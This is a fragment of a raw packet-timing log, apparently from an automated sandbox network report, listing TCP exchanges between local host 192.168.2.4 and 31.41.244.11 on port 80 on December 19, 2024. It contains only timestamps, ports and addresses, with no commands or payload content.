                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835760117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835777044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835802078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835802078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835813999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835932970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835947990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835957050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835964918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836124897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836139917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836154938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836169958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836169958 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836170912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836185932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836199045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836199045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836201906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836211920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836236000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836258888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836262941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836278915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836296082 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836349010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836349010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836457968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836473942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836524963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836524963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836590052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.836677074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.837380886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.837397099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.837414026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.837450027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.837475061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.838258982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.838275909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.838291883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.838327885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.838376045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.839103937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.839121103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.839137077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.839185953 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.839185953 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.839891911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.839951992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.840049028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.840065002 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.840125084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.840785980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.840801954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.840872049 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.840918064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.840981960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.841408968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.841461897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.841505051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.841552973 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.856669903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.856811047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.856827021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.856898069 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.856945992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.857197046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.857311964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.857328892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.857388020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.857388020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.857965946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.858165979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.005187035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.005207062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.005223989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.005340099 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.005340099 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.005579948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.005608082 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.005623102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.005683899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.005683899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.006525993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.006542921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.006655931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.007026911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.007042885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.007061005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.007091045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.007117987 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.008125067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.008141041 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.008157015 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.008179903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.008219957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.008851051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.008867025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.008882999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.009032011 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.009676933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.009692907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.009737968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.009752989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.009784937 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.010586977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.010601997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.010617971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.010667086 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.010668039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.011651039 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.011667967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.011683941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.011733055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.011733055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.012372017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.012411118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.012425900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.012480021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.012480021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.013298988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.013315916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.013331890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.013384104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.013384104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.014168024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.014246941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.014261961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.014305115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.015038967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.015053988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.015070915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.015083075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.015126944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.015902042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.015952110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.015969038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.016007900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.016007900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.016789913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.016805887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.016822100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.016834974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.016861916 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.016861916 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.017709970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.017725945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.017748117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.017779112 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.017810106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.018563032 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.018609047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.018630028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.018692970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.019526958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.019543886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.019560099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.019598007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.019598007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.020483017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.020498037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.020514965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.020546913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.020546913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.021301985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.021318913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.021336079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.021364927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.021421909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.022152901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.022180080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.022196054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.022241116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.022241116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.023039103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.023121119 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.023142099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.023175955 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.023175955 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.023983955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.023999929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.024017096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.024065018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.024065018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.024817944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.025135040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.025150061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.025165081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.025185108 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.025214911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.026052952 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.026073933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.026091099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.026125908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.026125908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.026894093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.026909113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.026957989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.026959896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.027792931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.027818918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.027833939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.027847052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.027847052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.027954102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.028805971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.028821945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.028836966 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.028848886 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.028877974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.028877974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.029570103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.029584885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.029602051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.029624939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.029624939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.029692888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.030468941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.030510902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.030535936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.030555964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.030572891 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.031385899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.031415939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.031430960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.031478882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.031478882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.032293081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.032309055 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.032325983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.032372952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.032372952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.033139944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.033155918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.033171892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.033198118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.033446074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.033957958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.034148932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.044699907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.044714928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.044730902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.044770956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.044823885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.045160055 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.045176983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.045192957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.045239925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.045239925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.045998096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.046531916 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.197217941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.197237968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.197253942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.197330952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.197331905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.197577000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.197602034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.197617054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.197648048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.197674036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.198446035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.198504925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.198637009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.198784113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.198846102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.198864937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.198893070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.198924065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.199721098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.199776888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.199794054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.199821949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.199868917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.200627089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.200644016 CET804986031.41.244.11192.168.2.4
